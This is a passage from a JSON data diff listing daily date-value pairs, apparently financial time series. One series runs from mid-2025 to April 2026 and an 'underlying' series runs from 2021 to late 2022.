"2025-05-30", + 63.819595541914694 + ], + [ + "2025-06-02", + 66.01955008092551 + ], + [ + "2025-06-03", + 68.10308340585843 + ], + [ + "2025-06-04", + 68.84256345882211 + ], + [ + "2025-06-05", + 64.4836328594528 + ], + [ + "2025-06-06", + 67.35295148500043 + ], + [ + "2025-06-09", + 67.77914949514076 + ], + [ + "2025-06-10", + 69.69652198876997 + ], + [ + "2025-06-11", + 67.47884540630193 + ], + [ + "2025-06-12", + 68.2346814341429 + ], + [ + "2025-06-13", + 60.16332910365525 + ], + [ + "2025-06-16", + 65.03612096510241 + ], + [ + "2025-06-17", + 59.46815944636405 + ], + [ + "2025-06-18", + 59.37356031358458 + ], + [ + "2025-06-20", + 57.02972417616982 + ], + [ + "2025-06-23", + 61.16983483328965 + ], + [ + "2025-06-24", + 66.40692513586401 + ], + [ + "2025-06-25", + 67.2151698426926 + ], + [ + "2025-06-26", + 70.05980537057388 + ], + [ + "2025-06-27", + 71.0592506726911 + ], + [ + "2025-06-30", + 72.90808242931367 + ], + [ + "2025-07-01", + 66.88107456957293 + ], + [ + "2025-07-02", + 69.13261845221513 + ], + [ + "2025-07-03", + 72.04424893207694 + ], + [ + "2025-07-07", + 66.7985676480177 + ], + [ + "2025-07-08", + 66.99010057696921 + ], + [ + "2025-07-09", + 69.3883734582547 + ], + [ + "2025-07-10", + 68.29510181021534 + ], + [ + "2025-07-11", + 66.53113802560149 + ], + [ + "2025-07-14", + 67.96403042548101 + ], + [ + "2025-07-15", + 68.33442999077897 + ], + [ + "2025-07-16", + 68.76917214428134 + ], + [ + "2025-07-17", + 72.03948538736724 + ], + [ + "2025-07-18", + 71.07979392604071 + ], + [ + "2025-07-21", + 73.15534420567222 + ], + [ + "2025-07-22", + 67.8901875165739 + ], + [ + "2025-07-23", + 69.93327409662058 + ], + [ + "2025-07-24", + 70.86897772324296 + ], + [ + "2025-07-25", + 71.93504272157745 + ], + [ + "2025-07-28", + 73.30422192899755 + ], + [ + "2025-07-29", + 71.43823289703089 + ], + [ + "2025-07-30", + 72.09878825387467 + ], + [ + "2025-07-31", + 65.62493205501937 + ], + [ + "2025-08-01", + 48.34054691522279 + ], + [ + "2025-08-04", + 59.01510648859198 + ], + [ + "2025-08-05", + 54.47249055841205 + ], + [ + "2025-08-06", + 60.49982245206533 + ], + [ + "2025-08-07", + 61.97611979171414 + ], + [ + "2025-08-08", + 65.78501933935215 + ], + [ + "2025-08-11", + 63.58878805899919 + ], + [ + "2025-08-12", + 68.40033408112188 + ], + [ + "2025-08-13", + 68.58047350566798 + ], + [ + "2025-08-14", + 67.93335461075753 + ], + [ + "2025-08-15", + 64.2353639251682 + ], + [ + "2025-08-18", + 63.89743340897804 + ], + [ + "2025-08-19", + 53.56736341215103 + ], + [ + "2025-08-20", + 49.8229359637736 + ], + [ + "2025-08-21", + 47.07604252730362 + ], + [ + "2025-08-22", + 55.78379861289441 + ], + [ + "2025-08-25", + 53.9682038609996 + ], + [ + "2025-08-26", + 56.10356916246403 + ], + [ + "2025-08-27", + 56.93053622206081 + ], + [ + "2025-08-28", + 60.222466997994836 + ], + [ + "2025-08-29", + 52.22383862785786 + ], + [ + "2025-09-02", + 47.37493261616602 + ], + [ + "2025-09-03", + 51.85648018737301 + ], + [ + "2025-09-04", + 56.48407071339886 + ], + [ + "2025-09-05", + 57.19680670879827 + ], + [ + "2025-09-08", + 59.608736080205674 + ], + [ + "2025-09-09", + 60.99031175443987 + ], + [ + "2025-09-10", + 61.15611308876964 + ], + [ + "2025-09-11", + 64.0803784693262 + ], + [ + "2025-09-12", + 66.17368744783712 + ], + [ + "2025-09-15", + 69.85488088264219 + ], + [ + "2025-09-16", + 69.04883502375056 + ], + [ + "2025-09-17", + 67.08180006544998 + ], + [ + "2025-09-18", + 71.08192307460797 + ], + [ + "2025-09-19", + 73.6900888590771 + ], + [ + "2025-09-22", + 75.76274071464627 + ], + [ + "2025-09-23", + 69.1421001355141 + ], + [ + "2025-09-24", + 65.88680585399959 + ], + [ + "2025-09-25", + 62.0374285186501 + ], + [ + "2025-09-26", + 64.17729160462592 + ], + [ + "2025-09-29", + 66.47908229935882 + ], + [ + "2025-09-30", + 67.80296788043026 + ], + [ + "2025-10-01", + 70.04057372738227 + ], + [ + "2025-10-02", + 71.85453764194443 + ], + [ + "2025-10-03", + 67.33982343140093 + ], + [ + "2025-10-06", + 70.84447623996012 + ], + [ + "2025-10-07", + 65.49772715886428 + ], + [ + "2025-10-08", + 70.66175259230118 + ], + [ + "2025-10-09", + 69.46615025689296 + ], + [ + "2025-10-10", + 45.64021337451138 + ], + [ + "2025-10-13", + 55.36826725240064 + ], + [ + "2025-10-14", + 52.14686880542057 + ], + [ + "2025-10-15", + 55.107031237383026 + ], + [ + "2025-10-16", + 53.233059774732666 + ], + [ + "2025-10-17", + 56.075173859586954 + ], + [ + "2025-10-20", + 61.00457468895436 + ], + [ + "2025-10-21", + 60.85000057642217 + ], + [ + "2025-10-22", + 55.293982488570855 + ], + [ + "2025-10-23", + 58.79533912534239 + ], + [ + "2025-10-24", + 62.81296549526021 + ], + [ + "2025-10-27", + 68.40513630102328 + ], + [ + "2025-10-28", + 70.50443982975568 + ], + [ + "2025-10-29", + 71.69937155408067 + ], + [ + "2025-10-30", + 62.412633472916816 + ], + [ + "2025-10-31", + 63.97397628081228 + ], + [ + "2025-11-03", + 65.51160293504866 + ], + [ + "2025-11-04", + 54.778984849156714 + ], + [ + "2025-11-05", + 57.15350218750351 + ], + [ + "2025-11-06", + 49.147110360156105 + ], + [ + "2025-11-07", + 47.94471464231679 + ], + [ + "2025-11-10", + 56.04015808073028 + ], + [ + "2025-11-11", + 54.90855933538518 + ], + [ + "2025-11-12", + 54.55833590946768 + ], + [ + "2025-11-13", + 46.324403992722175 + ], + [ + "2025-11-14", + 46.639010423366955 + ], + [ + "2025-11-17", + 43.53257762472305 + ], + [ + "2025-11-18", + 39.52520941181165 + ], + [ + "2025-11-19", + 42.295960673713985 + ], + [ + "2025-11-20", + 35.34062649340804 + ], + [ + "2025-11-21", + 38.70421906183529 + ], + [ + "2025-11-24", + 48.5828218141767 + ], + [ + "2025-11-25", + 50.6979814722768 + ], + [ + "2025-11-26", + 53.65903707584881 + ], + [ + "2025-11-28", + 56.276769204700344 + ], + [ + "2025-12-01", + 54.88228154023377 + ], + [ + "2025-12-02", + 57.51490466374675 + ], + [ + "2025-12-03", + 58.33879337963377 + ], + [ + "2025-12-04", + 57.87760872316863 + ], + [ + "2025-12-05", + 59.39166776468385 + ], + [ + "2025-12-08", + 58.32500597674155 + ], + [ + "2025-12-09", + 58.83585138514212 + ], + [ + "2025-12-10", + 60.566619856588076 + ], + [ + "2025-12-11", + 58.467410814937956 + ], + [ + "2025-12-12", + 47.927424025243326 + ], + [ + "2025-12-15", + 45.64538822487104 + ], + [ + "2025-12-16", + 46.71871224117461 + ], + [ + "2025-12-17", + 38.95492011072357 + ], + [ + "2025-12-18", + 46.32459711578058 + ], + [ + "2025-12-19", + 52.017929565707455 + ], + [ + "2025-12-22", + 53.97632077742141 + ], + [ + "2025-12-23", + 55.880129705794744 + ], + [ + "2025-12-24", + 57.08011370905479 + ], + [ + "2025-12-26", + 57.0433669953668 + ], + [ + "2025-12-29", + 54.207953215735586 + ], + [ + "2025-12-30", + 52.85872535467684 + ], + [ + "2025-12-31", + 48.25953437528475 + ], + [ + "2026-01-02", + 47.2309351560116 + ], + [ + "2026-01-05", + 51.762234415714815 + ], + [ + "2026-01-06", + 56.27112836392292 + ], + [ + "2026-01-07", + 56.752218573590824 + ], + [ + "2026-01-08", + 53.034768045808285 + ], + [ + "2026-01-09", + 58.17135674454298 + ], + [ + "2026-01-12", + 58.581834434856034 + ], + [ + "2026-01-13", + 57.49513211161684 + ], + [ + "2026-01-14", + 50.27091764790263 + ], + [ + "2026-01-15", + 52.41717189711224 + ], + [ + "2026-01-16", + 51.855166869210464 + ], + [ + "2026-01-20", + 40.10133811526066 + ], + [ + "2026-01-21", + 48.00503796039357 + ], + [ + "2026-01-22", + 51.742440220172874 + ], + [ + "2026-01-23", + 53.323211023382754 + ], + [ + "2026-01-26", + 55.51694352471599 + ], + [ + "2026-01-27", + 59.734210608640105 + ], + [ + "2026-01-28", + 61.19461200092747 + ], + [ + "2026-01-29", + 57.14689022647383 + ], + [ + "2026-01-30", + 50.037085433226196 + ], + [ + "2026-02-02", + 53.552082031342586 + ], + [ + "2026-02-03", + 45.74404152231136 + ], + [ + "2026-02-04", + 38.90501444150914 + ], + [ + "2026-02-05", + 34.41824811309651 + ], + [ + "2026-02-06", + 44.410208828158424 + ], + [ + "2026-02-09", + 47.59226050025101 + ], + [ + "2026-02-10", + 45.86671729977215 + ], + [ + "2026-02-11", + 47.05627408379248 + ], + [ + "2026-02-12", + 39.880244029915396 + ], + [ + "2026-02-13", + 40.87691118834038 + ], + [ + "2026-02-17", + 40.52642539871173 + ], + [ + "2026-02-18", + 44.25393078709592 + ], + [ + "2026-02-19", + 42.76257443872528 + ], + [ + "2026-02-20", + 47.17530810983585 + ], + [ + "2026-02-23", + 42.30762574801139 + ], + [ + "2026-02-24", + 47.40917120518116 + ], + [ + "2026-02-25", + 53.454077884728335 + ], + [ + "2026-02-26", + 48.39510956610352 + ], + [ + "2026-02-27", + 47.135931670843604 + ], + [ + "2026-03-02", + 47.736726975802995 + ], + [ + "2026-03-03", + 43.413082511001164 + ], + [ + "2026-03-04", + 50.24868541155772 + ], + [ + "2026-03-05", + 48.97034188922371 + ], + [ + "2026-03-06", + 43.09312578022117 + ], + [ + "2026-03-09", + 48.8717431899611 + ], + [ + "2026-03-10", + 48.87873810903544 + ], + [ + "2026-03-11", + 48.821324909310576 + ], + [ + "2026-03-12", + 41.90931224325608 + ], + [ + "2026-03-13", + 39.84724963604077 + ], + [ + "2026-03-16", + 45.300153835037264 + ], + [ + "2026-03-17", + 47.55271499992876 + ], + [ + "2026-03-18", + 42.18317713817426 + ], + [ + "2026-03-19", + 41.06679191237363 + ], + [ + "2026-03-20", + 35.21569410960352 + ], + [ + "2026-03-23", + 40.75717585459889 + ], + [ + "2026-03-24", + 38.61431534595702 + ], + [ + "2026-03-25", + 41.7640348333204 + ], + [ + "2026-03-26", + 34.74864717421828 + ], + [ + "2026-03-27", + 30.360436750973705 + ], + [ + "2026-03-30", + 28.855145232580554 + ], + [ + "2026-03-31", + 42.37827659017563 + ], + [ + "2026-04-01", + 46.509016939289936 + ], + [ + "2026-04-02", + 46.89426605434136 + ], + [ + "2026-04-06", + 48.973589822158246 + ], + [ + "2026-04-07", + 49.0285590080683 + ], + [ + "2026-04-08", + 58.40813726994054 + ], + [ + "2026-04-09", + 60.25350589465764 + ], + [ + "2026-04-10", + 60.656994053883935 + ], + [ + "2026-04-13", + 63.52111103958168 + ], + [ + "2026-04-14", + 67.97449735441921 + ], + [ + "2026-04-15", + 70.9705737687095 + ], + [ + "2026-04-16", + 71.95622612902179 + ], + [ + "2026-04-17", + 74.50130606943871 + ], + [ + "2026-04-20", + 72.75337133830018 + ], + [ + "2026-04-21", + 70.62253156078626 + ], + [ + "2026-04-22", + 74.18999633359849 + ], + [ + "2026-04-23", + 71.01117668491865 + ] + ], + "underlying": [ + [ + "2021-04-26", + 26.55736541748047 + ], + [ + "2021-04-27", + 26.208738327026367 + ], + [ + "2021-04-28", + 25.938913345336914 + ], + [ + "2021-04-29", + 26.199188232421875 + ], + [ + "2021-04-30", + 25.70729637145996 + ], + [ + "2021-05-03", + 25.28704261779785 + ], + [ + "2021-05-04", + 23.954635620117188 + ], + [ + "2021-05-05", + 23.67525863647461 + ], + [ + "2021-05-06", + 24.193418502807617 + ], + [ + "2021-05-07", + 24.785598754882812 + ], + [ + "2021-05-10", + 22.923095703125 + ], + [ + "2021-05-11", + 22.8084774017334 + ], + [ + "2021-05-12", + 21.07253074645996 + ], + [ + "2021-05-13", + 21.51666831970215 + ], + [ + "2021-05-14", + 22.91592788696289 + ], + [ + "2021-05-17", + 22.529104232788086 + ], + [ + "2021-05-18", + 22.05631446838379 + ], + [ + "2021-05-19", + 22.13749885559082 + ], + [ + "2021-05-20", + 23.41737174987793 + ], + [ + "2021-05-21", + 23.030548095703125 + ], + [ + "2021-05-24", + 24.183862686157227 + ], + [ + "2021-05-25", + 24.300867080688477 + ], + [ + "2021-05-26", + 24.54681396484375 + ], + [ + "2021-05-27", + 24.260272979736328 + ], + [ + "2021-05-28", + 24.496671676635742 + ], + [ + "2021-06-01", + 24.257888793945312 + ], + [ + "2021-06-02", + 24.384445190429688 + ], + [ + "2021-06-03", + 23.61795425415039 + ], + [ + "2021-06-04", + 24.82857894897461 + ], + [ + "2021-06-07", + 25.048255920410156 + ], + [ + "2021-06-08", + 25.07691192626953 + ], + [ + "2021-06-09", + 25.105562210083008 + ], + [ + "2021-06-10", + 25.87444496154785 + ], + [ + "2021-06-11", + 26.079797744750977 + ], + [ + "2021-06-14", + 26.810470581054688 + ], + [ + "2021-06-15", + 26.313804626464844 + ], + [ + "2021-06-16", + 26.032039642333984 + ], + [ + "2021-06-17", + 27.00388526916504 + ], + [ + "2021-06-18", + 26.35917091369629 + ], + [ + "2021-06-21", + 26.841514587402344 + ], + [ + "2021-06-22", + 27.591291427612305 + ], + [ + "2021-06-23", + 27.639041900634766 + ], + [ + "2021-06-24", + 28.147653579711914 + ], + [ + "2021-06-25", + 28.059301376342773 + ], + [ + "2021-06-28", + 29.05263900756836 + ], + [ + "2021-06-29", + 29.379762649536133 + ], + [ + "2021-06-30", + 29.250825881958008 + ], + [ + "2021-07-01", + 29.265155792236328 + ], + [ + "2021-07-02", + 30.258485794067383 + ], + [ + "2021-07-06", + 30.664411544799805 + ], + [ + "2021-07-07", + 30.860219955444336 + ], + [ + "2021-07-08", + 30.325345993041992 + ], + [ + "2021-07-09", + 30.83872413635254 + ], + [ + "2021-07-12", + 31.225549697875977 + ], + [ + "2021-07-13", + 31.20884132385254 + ], + [ + "2021-07-14", + 31.378374099731445 + ], + [ + "2021-07-15", + 30.7288875579834 + ], + [ + "2021-07-16", + 29.974334716796875 + ], + [ + "2021-07-19", + 29.25560188293457 + ], + [ + "2021-07-20", + 30.220279693603516 + ], + [ + "2021-07-21", + 30.910358428955078 + ], + [ + "2021-07-22", + 31.559844970703125 + ], + [ + "2021-07-23", + 32.608097076416016 + ], + [ + "2021-07-26", + 32.74421691894531 + ], + [ + "2021-07-27", + 31.674468994140625 + ], + [ + "2021-07-28", + 32.020694732666016 + ], + [ + "2021-07-29", + 32.17829895019531 + ], + [ + "2021-07-30", + 31.695960998535156 + ], + [ + "2021-08-02", + 31.686405181884766 + ], + [ + "2021-08-03", + 32.23798370361328 + ], + [ + "2021-08-04", + 32.39796829223633 + ], + [ + "2021-08-05", + 33.00686264038086 + ], + [ + "2021-08-06", + 32.577064514160156 + ], + [ + "2021-08-09", + 32.75136947631836 + ], + [ + "2021-08-10", + 32.26186752319336 + ], + [ + "2021-08-11", + 32.08756637573242 + ], + [ + "2021-08-12", + 32.42184829711914 + ], + [ + "2021-08-13", + 32.74660110473633 + ], + [ + "2021-08-16", + 32.80390167236328 + ], + [ + "2021-08-17", + 31.94189453125 + ], + [ + "2021-08-18", + 31.01304054260254 + ], + [ + "2021-08-19", + 31.45478630065918 + ], + [ + "2021-08-20", + 32.4266242980957 + ], + [ + "2021-08-23", + 33.87126541137695 + ], + [ + "2021-08-24", + 34.2055549621582 + ], + [ + "2021-08-25", + 34.2437629699707 + ], + [ + "2021-08-26", + 33.663516998291016 + ], + [ + "2021-08-27", + 34.64730453491211 + ], + [ + "2021-08-30", + 35.79584884643555 + ], + [ + "2021-08-31", + 35.695560455322266 + ], + [ + "2021-09-01", + 35.891357421875 + ], + [ + "2021-09-02", + 35.841217041015625 + ], + [ + "2021-09-03", + 36.163570404052734 + ], + [ + "2021-09-07", + 36.31161880493164 + ], + [ + "2021-09-08", + 35.939109802246094 + ], + [ + "2021-09-09", + 35.55467224121094 + ], + [ + "2021-09-10", + 34.75475311279297 + ], + [ + "2021-09-13", + 34.67596435546875 + ], + [ + "2021-09-14", + 34.37748336791992 + ], + [ + "2021-09-15", + 35.13919448852539 + ], + [ + "2021-09-16", + 35.20844268798828 + ], + [ + "2021-09-17", + 33.964393615722656 + ], + [ + "2021-09-20", + 31.875045776367188 + ], + [ + "2021-09-21", + 31.915634155273438 + ], + [ + "2021-09-22", + 32.849281311035156 + ], + [ + "2021-09-23", + 33.761417388916016 + ], + [ + "2021-09-24", + 33.856937408447266 + ], + [ + "2021-09-27", + 33.04030227661133 + ], + [ + "2021-09-28", + 30.284753799438477 + ], + [ + "2021-09-29", + 30.08417510986328 + ], + [ + "2021-09-30", + 29.745107650756836 + ], + [ + "2021-10-01", + 30.287139892578125 + ], + [ + "2021-10-04", + 28.424640655517578 + ], + [ + "2021-10-05", + 29.51826286315918 + ], + [ + "2021-10-06", + 30.100889205932617 + ], + [ + "2021-10-07", + 30.915142059326172 + ], + [ + "2021-10-08", + 30.439964294433594 + ], + [ + "2021-10-11", + 29.76420783996582 + ], + [ + "2021-10-12", + 29.460952758789062 + ], + [ + "2021-10-13", + 30.151037216186523 + ], + [ + "2021-10-14", + 31.815351486206055 + ], + [ + "2021-10-15", + 32.405147552490234 + ], + [ + "2021-10-18", + 33.37698745727539 + ], + [ + "2021-10-19", + 34.110042572021484 + ], + [ + "2021-10-20", + 34.00258255004883 + ], + [ + "2021-10-21", + 34.61149215698242 + ], + [ + "2021-10-22", + 33.73515319824219 + ], + [ + "2021-10-25", + 34.74758529663086 + ], + [ + "2021-10-26", + 35.07233810424805 + ], + [ + "2021-10-27", + 35.34931945800781 + ], + [ + "2021-10-28", + 36.509803771972656 + ], + [ + "2021-10-29", + 37.04945755004883 + ], + [ + "2021-11-01", + 37.414791107177734 + ], + [ + "2021-11-02", + 37.91384506225586 + ], + [ + "2021-11-03", + 39.117305755615234 + ], + [ + "2021-11-04", + 40.576263427734375 + ], + [ + "2021-11-05", + 40.72670364379883 + ], + [ + "2021-11-08", + 40.5595588684082 + ], + [ + "2021-11-09", + 39.72381591796875 + ], + [ + "2021-11-10", + 37.983089447021484 + ], + [ + "2021-11-11", + 38.29112243652344 + ], + [ + "2021-11-12", + 39.50651931762695 + ], + [ + "2021-11-15", + 39.49458694458008 + ], + [ + "2021-11-16", + 40.311222076416016 + ], + [ + "2021-11-17", + 40.35897445678711 + ], + [ + "2021-11-18", + 41.593482971191406 + ], + [ + "2021-11-19", + 42.29787826538086 + ], + [ + "2021-11-22", + 40.831764221191406 + ], + [ + "2021-11-23", + 40.2754020690918 + ], + [ + "2021-11-24", + 40.64790344238281 + ], + [ + "2021-11-26", + 38.40573501586914 + ], + [ + "2021-11-29", + 40.791168212890625 + ], + [ + "2021-11-30", + 39.038509368896484 + ], + [ + "2021-12-01", + 37.035133361816406 + ], + [ + "2021-12-02", + 37.73237228393555 + ], + [ + "2021-12-03", + 35.83643341064453 + ], + [ + "2021-12-06", + 36.674564361572266 + ], + [ + "2021-12-07", + 39.98170471191406 + ], + [ + "2021-12-08", + 40.53805923461914 + ], + [ + "2021-12-09", + 38.78779983520508 + ], + [ + "2021-12-10", + 39.98886489868164 + ], + [ + "2021-12-13", + 38.26963424682617 + ], + [ + "2021-12-14", + 37.13064193725586 + ], + [ + "2021-12-15", + 39.58770751953125 + ], + [ + "2021-12-16", + 36.56711196899414 + ], + [ + "2021-12-17", + 36.00836181640625 + ], + [ + "2021-12-20", + 34.93144989013672 + ], + [ + "2021-12-21", + 37.26675033569336 + ], + [ + "2021-12-22", + 38.59676742553711 + ], + [ + "2021-12-23", + 39.51368713378906 + ], + [ + "2021-12-27", + 41.402462005615234 + ], + [ + "2021-12-28", + 40.915340423583984 + ], + [ + "2021-12-29", + 40.850868225097656 + ], + [ + "2021-12-30", + 40.46881866455078 + ], + [ + "2021-12-31", + 39.71665954589844 + ], + [ + "2022-01-03", + 40.86281204223633 + ], + [ + "2022-01-04", + 39.274906158447266 + ], + [ + "2022-01-05", + 35.66213607788086 + ], + [ + "2022-01-06", + 35.56422805786133 + ], + [ + "2022-01-07", + 34.401363372802734 + ], + [ + "2022-01-10", + 34.527915954589844 + ], + [ + "2022-01-11", + 36.04656219482422 + ], + [ + "2022-01-12", + 36.457271575927734 + ], + [ + "2022-01-13", + 33.81156539916992 + ], + [ + "2022-01-14", + 34.322566986083984 + ], + [ + "2022-01-18", + 31.84877586364746 + ], + [ + "2022-01-19", + 30.740827560424805 + ], + [ + "2022-01-20", + 29.551692962646484 + ], + [ + "2022-01-21", + 27.063579559326172 + ], + [ + "2022-01-24", + 27.45518684387207 + ], + [ + "2022-01-25", + 25.43031120300293 + ], + [ + "2022-01-26", + 25.382556915283203 + ], + [ + "2022-01-27", + 24.623226165771484 + ], + [ + "2022-01-28", + 26.920310974121094 + ], + [ + "2022-01-31", + 29.527812957763672 + ], + [ + "2022-02-01", + 30.091337203979492 + ], + [ + "2022-02-02", + 30.802907943725586 + ], + [ + "2022-02-03", + 27.097009658813477 + ], + [ + "2022-02-04", + 28.033037185668945 + ], + [ + "2022-02-07", + 27.39787483215332 + ], + [ + "2022-02-08", + 28.329132080078125 + ], + [ + "2022-02-09", + 30.08656120300293 + ], + [ + "2022-02-10", + 28.090343475341797 + ], + [ + "2022-02-11", + 25.444631576538086 + ], + [ + "2022-02-14", + 25.516267776489258 + ], + [ + "2022-02-15", + 27.364444732666016 + ], + [ + "2022-02-16", + 27.359668731689453 + ], + [ + "2022-02-17", + 24.933643341064453 + ], + [ + "2022-02-18", + 24.088348388671875 + ], + [ + "2022-02-22", + 23.343351364135742 + ], + [ + "2022-02-23", + 21.557260513305664 + ], + [ + "2022-02-24", + 23.668102264404297 + ], + [ + "2022-02-25", + 24.790372848510742 + ], + [ + "2022-02-28", + 25.053028106689453 + ], + [ + "2022-03-01", + 23.897327423095703 + ], + [ + "2022-03-02", + 25.038705825805664 + ], + [ + "2022-03-03", + 23.992841720581055 + ], + [ + "2022-03-04", + 22.966075897216797 + ], + [ + "2022-03-07", + 20.40155792236328 + ], + [ + "2022-03-08", + 20.119792938232422 + ], + [ + "2022-03-09", + 22.273609161376953 + ], + [ + "2022-03-10", + 21.557260513305664 + ], + [ + "2022-03-11", + 20.22007942199707 + ], + [ + "2022-03-14", + 19.035720825195312 + ], + [ + "2022-03-15", + 20.797935485839844 + ], + [ + "2022-03-16", + 23.133222579956055 + ], + [ + "2022-03-17", + 23.906877517700195 + ], + [ + "2022-03-18", + 25.392099380493164 + ], + [ + "2022-03-21", + 25.210628509521484 + ], + [ + "2022-03-22", + 26.70063018798828 + ], + [ + "2022-03-23", + 25.573575973510742 + ], + [ + "2022-03-24", + 27.23072624206543 + ], + [ + "2022-03-25", + 27.187744140625 + ], + [ + "2022-03-28", + 28.424640655517578 + ], + [ + "2022-03-29", + 29.881210327148438 + ], + [ + "2022-03-30", + 28.983388900756836 + ], + [ + "2022-03-31", + 27.78470230102539 + ], + [ + "2022-04-01", + 27.665311813354492 + ], + [ + "2022-04-04", + 29.39409637451172 + ], + [ + "2022-04-05", + 27.45040512084961 + ], + [ + "2022-04-06", + 25.64520835876465 + ], + [ + "2022-04-07", + 25.812362670898438 + ], + [ + "2022-04-08", + 24.756946563720703 + ], + [ + "2022-04-11", + 22.9995059967041 + ], + [ + "2022-04-12", + 22.703414916992188 + ], + [ + "2022-04-13", + 24.064477920532227 + ], + [ + "2022-04-14", + 22.44553565979004 + ], + [ + "2022-04-18", + 22.507619857788086 + ], + [ + "2022-04-19", + 23.954635620117188 + ], + [ + "2022-04-20", + 22.87533950805664 + ], + [ + "2022-04-21", + 21.533382415771484 + ], + [ + "2022-04-22", + 19.823699951171875 + ], + [ + "2022-04-25", + 20.55915069580078 + ], + [ + "2022-04-26", + 18.247737884521484 + ], + [ + "2022-04-27", + 18.16655158996582 + ], + [ + "2022-04-28", + 20.086360931396484 + ], + [ + "2022-04-29", + 17.445432662963867 + ], + [ + "2022-05-02", + 18.266845703125 + ], + [ + "2022-05-03", + 18.30982208251953 + ], + [ + "2022-05-04", + 20.124568939208984 + ], + [ + "2022-05-05", + 17.125463485717773 + ], + [ + "2022-05-06", + 16.528512954711914 + ], + [ + "2022-05-09", + 14.575267791748047 + ], + [ + "2022-05-10", + 15.076709747314453 + ], + [ + "2022-05-11", + 13.734755516052246 + ], + [ + "2022-05-12", + 13.624916076660156 + ], + [ + "2022-05-13", + 15.105363845825195 + ], + [ + "2022-05-16", + 14.637351989746094 + ], + [ + "2022-05-17", + 15.740523338317871 + ], + [ + "2022-05-18", + 13.443442344665527 + ], + [ + "2022-05-19", + 13.171229362487793 + ], + [ + "2022-05-20", + 13.056612968444824 + ], + [ + "2022-05-23", + 13.701326370239258 + ], + [ + "2022-05-24", + 12.84648323059082 + ], + [ + "2022-05-25", + 13.36225414276123 + ], + [ + "2022-05-26", + 14.479754447937012 + ], + [ + "2022-05-27", + 15.898120880126953 + ], + [ + "2022-05-31", + 15.7835054397583 + ], + [ + "2022-06-01", + 15.415783882141113 + ], + [ + "2022-06-02", + 16.667003631591797 + ], + [ + "2022-06-03", + 15.348923683166504 + ], + [ + "2022-06-06", + 15.539950370788574 + ], + [ + "2022-06-07", + 15.91722583770752 + ], + [ + "2022-06-08", + 15.59248161315918 + ], + [ + "2022-06-09", + 14.322159767150879 + ], + [ + "2022-06-10", + 12.793954849243164 + ], + [ + "2022-06-13", + 11.022188186645508 + ], + [ + "2022-06-14", + 11.093823432922363 + ], + [ + "2022-06-15", + 11.891355514526367 + ], + [ + "2022-06-16", + 10.439559936523438 + ], + [ + "2022-06-17", + 10.826386451721191 + ], + [ + "2022-06-21", + 11.643024444580078 + ], + [ + "2022-06-22", + 11.600043296813965 + ], + [ + "2022-06-23", + 12.096709251403809 + ], + [ + "2022-06-24", + 13.36225414276123 + ], + [ + "2022-06-27", + 13.047061920166016 + ], + [ + "2022-06-28", + 11.857926368713379 + ], + [ + "2022-06-29", + 11.881803512573242 + ], + [ + "2022-06-30", + 11.4615478515625 + ], + [ + "2022-07-01", + 11.647797584533691 + ], + [ + "2022-07-05", + 12.249529838562012 + ], + [ + "2022-07-06", + 12.483534812927246 + ], + [ + "2022-07-07", + 13.257190704345703 + ], + [ + "2022-07-08", + 13.31927490234375 + ], + [ + "2022-07-11", + 12.46921157836914 + ], + [ + "2022-07-12", + 12.106260299682617 + ], + [ + "2022-07-13", + 12.029850006103516 + ], + [ + "2022-07-14", + 12.154016494750977 + ], + [ + "2022-07-15", + 12.793954849243164 + ], + [ + "2022-07-18", + 12.497862815856934 + ], + [ + "2022-07-19", + 13.591484069824219 + ], + [ + "2022-07-20", + 14.274401664733887 + ], + [ + "2022-07-21", + 14.880910873413086 + ], + [ + "2022-07-22", + 14.1024808883667 + ], + [ + "2022-07-25", + 13.892351150512695 + ], + [ + "2022-07-26", + 13.051837921142578 + ], + [ + "2022-07-27", + 14.68033218383789 + ], + [ + "2022-07-28", + 15.10058879852295 + ], + [ + "2022-07-29", + 15.931551933288574 + ], + [ + "2022-08-01", + 15.907675743103027 + ], + [ + "2022-08-02", + 15.759628295898438 + ], + [ + "2022-08-03", + 17.020395278930664 + ], + [ + "2022-08-04", + 17.263957977294922 + ], + [ + "2022-08-05", + 16.853252410888672 + ], + [ + "2022-08-08", + 16.68132781982422 + ], + [ + "2022-08-09", + 16.10824966430664 + ], + [ + "2022-08-10", + 17.43110466003418 + ], + [ + "2022-08-11", + 17.16844367980957 + ], + [ + "2022-08-12", + 18.13789939880371 + ], + [ + "2022-08-15", + 18.572484970092773 + ], + [ + "2022-08-16", + 18.453092575073242 + ], + [ + "2022-08-17", + 17.813154220581055 + ], + [ + "2022-08-18", + 17.93255043029785 + ], + [ + "2022-08-19", + 16.88190269470215 + ], + [ + "2022-08-22", + 15.554276466369629 + ], + [ + "2022-08-23", + 15.501744270324707 + ], + [ + "2022-08-24", + 15.621136665344238 + ], + [ + "2022-08-25", + 16.442548751831055 + ], + [ + "2022-08-26", + 14.441550254821777 + ], + [ + "2022-08-29", + 13.997414588928223 + ], + [ + "2022-08-30", + 13.529400825500488 + ], + [ + "2022-08-31", + 13.281068801879883 + ], + [ + "2022-09-01", + 13.295395851135254 + ], + [ + "2022-09-02", + 12.741421699523926 + ], + [ + "2022-09-06", + 12.450105667114258 + ], + [ + "2022-09-07", + 13.185555458068848 + ], + [ + "2022-09-08", + 13.400458335876465 + ], + [ + "2022-09-09", + 14.250523567199707 + ], + [ + "2022-09-12", + 14.771069526672363 + ], + [ + "2022-09-13", + 12.340266227722168 + ], + [ + "2022-09-14", + 12.617255210876465 + ], + [ + "2022-09-15", + 11.982090950012207 + ], + [ + "2022-09-16", + 11.748086929321289 + ], + [ + "2022-09-19", + 12.029850006103516 + ], + [ + "2022-09-20", + 11.743310928344727 + ], + [ + "2022-09-21", + 11.09859848022461 + ], + [ + "2022-09-22", + 10.687891006469727 + ], + [ + "2022-09-23", + 10.176897048950195 + ], + [ + "2022-09-26", + 10.038409233093262 + ], + [ + "2022-09-27", + 10.047957420349121 + ], + [ + "2022-09-28", + 10.635361671447754 + ], + [ + "2022-09-29", + 9.737540245056152 + ], + [ + "2022-09-30", + 9.226546287536621 + ], + [ + "2022-10-03", + 9.866482734680176 + ], + [ + "2022-10-04", + 10.783405303955078 + ], + [ + "2022-10-05", + 10.783405303955078 + ], + [ + "2022-10-06", + 10.511195182800293 + ], + [ + "2022-10-07", + 9.312507629394531 + ], + [ + "2022-10-10", + 9.021191596984863 + ], + [ + "2022-10-11", + 8.663019180297852 + ], + [ + "2022-10-12", + 8.643916130065918 + ], + [ + "2022-10-13", + 9.221771240234375 + ], + [ + "2022-10-14", + 8.390809059143066 + ], + [ + "2022-10-17", + 9.216995239257812 